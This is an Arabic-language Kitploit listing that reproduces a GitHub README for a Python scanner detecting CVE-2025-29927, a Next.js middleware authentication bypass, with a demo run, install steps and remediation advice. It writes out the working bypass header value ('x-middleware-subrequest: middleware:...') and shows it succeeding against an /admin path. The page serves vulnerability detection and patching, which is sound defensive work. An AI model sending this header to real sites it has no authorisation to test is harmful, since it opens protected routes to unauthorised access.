Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-29927 — 🔐 ماسح ذكي مبني على بايثون لثغرة CVE-2025-29927 — ثغرة تجاوز المصادقة في middleware الخاص بـ Next.js. يكتشف meta refresh وعمليات إعادة التوجيه المستندة إلى الكلمات المفتاحية والمزيد. | Kitploit
أدوات/GitHubGitHub/sagsooz/cve-2025-29927
ماسحات الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubsagsooz/cve-2025-29927

CVE-2025-29927

🔐 ماسح ذكي مبني على بايثون لثغرة CVE-2025-29927 — ثغرة تجاوز المصادقة في middleware الخاص بـ Next.js. يكتشف meta refresh وعمليات إعادة التوجيه المستندة إلى الكلمات المفتاحية والمزيد.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔍 CVE-2025-29927 - كاشف تجاوز الوسيطة في Next.js

يساعد هذا الماسح الذكي المبني بلغة بايثون في اكتشاف الثغرة CVE-2025-29927 في تطبيقات Next.js — وهي عبارة عن تجاوز حرج للوسيطة (middleware) يسمح للمهاجمين بتخطي المصادقة باستخدام ترويسة HTTP مصممة بعناية.

🧠 لا تكتشف الأداة عمليات إعادة التوجيه عبر HTTP فحسب، بل أيضًا آليات إعادة التوجيه من جانب العميل مثل <meta http-equiv="refresh">، وعمليات إعادة التوجيه القائمة على الكلمات المفتاحية لتسجيل الدخول، وتجاوزات المصادقة الصامتة.


🚀 الميزات

  • ✅ إدخال تفاعلي (رابط الهدف والمسار)
  • ✅ اكتشاف ذكي لما يلي:
    • ترويسات التجاوز x-middleware-subrequest
    • عمليات إعادة التوجيه المستندة إلى <meta refresh>
    • محتوى HTML يحتوي على كلمات مفتاحية مثل login وsign in وauthentication
  • ✅ مخرجات ملونة لواجهة الأوامر:
    • 🟩 الأخضر لاستجابات 2xx
    • 🟨 الأصفر لاستجابات 3xx
    • 🟥 الأحمر لاستجابات 4xx/5xx
  • ✅ خروج مبكر إذا نجح التجاوز
  • ✅ سهولة التوسيع والتخصيص

📸 العرض التوضيحي

root@kitploit:~
$ python3 CVE-2025-29927.py

🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin

→ Testing with header: middleware:middleware:middleware:middleware:middleware
   ↳ HTTP Status: 200
   ↳ Redirect detected: No

✅ VULNERABLE! Bypass successful with header:
   x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

🧑‍💻 طريقة الاستخدام

1. استنساخ المستودع:

root@kitploit:~
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927

2. تثبيت التبعيات:

root@kitploit:~
pip install -r requirements.txt

3. تشغيل السكربت:

root@kitploit:~
python3 CVE-2025-29927.py

📂 هيكل المشروع

root@kitploit:~
.
├── CVE-2025-29927.py   # Main interactive scanner
├── requirements.txt            # Python dependencies
└── README.md                   # This file

📦 requirements.txt

root@kitploit:~
requests
beautifulsoup4
colorama

🛡️ طريقة الإصلاح

إذا كان تطبيقك متأثرًا، فاتبع ما يلي:

  1. حدّث Next.js إلى الإصدار v15.2.3 أو أحدث (أو 14.2.25+ / 13.5.7+)
  2. حصّن توجيه الوسيطة وتجنب الاعتماد عليها وحدها في المصادقة.
  3. أزل ترويسة x-middleware-subrequest عند الحافة (مثل Nginx):
root@kitploit:~
proxy_set_header x-middleware-subrequest "";

ℹ️ حول الثغرة

تسمح الثغرة CVE-2025-29927 للمهاجمين بتجاوز فحوصات الوسيطة في Next.js عن طريق التلاعب بترويسة x-middleware-subrequest بقيم مصممة مثل:

root@kitploit:~
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

في الإصدارات المتأثرة، يؤدي هذا إلى تعطيل تنفيذ الوسيطة تمامًا — مما يسمح بالوصول المباشر إلى المسارات المحمية مثل /dashboard و/admin وما إلى ذلك.


📬 التواصل

تتم صيانة الأداة بواسطة: @mrzblackhat
لا تتردد في التواصل معي على تيليجرام للاقتراحات أو التحسينات أو المساهمات.


🏷 الوسوم

next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking


📄 الترخيص

هذه الأداة مقدمة لأغراض تعليمية وبحثية فقط. استخدمها بمسؤولية.

تنزيل الأداة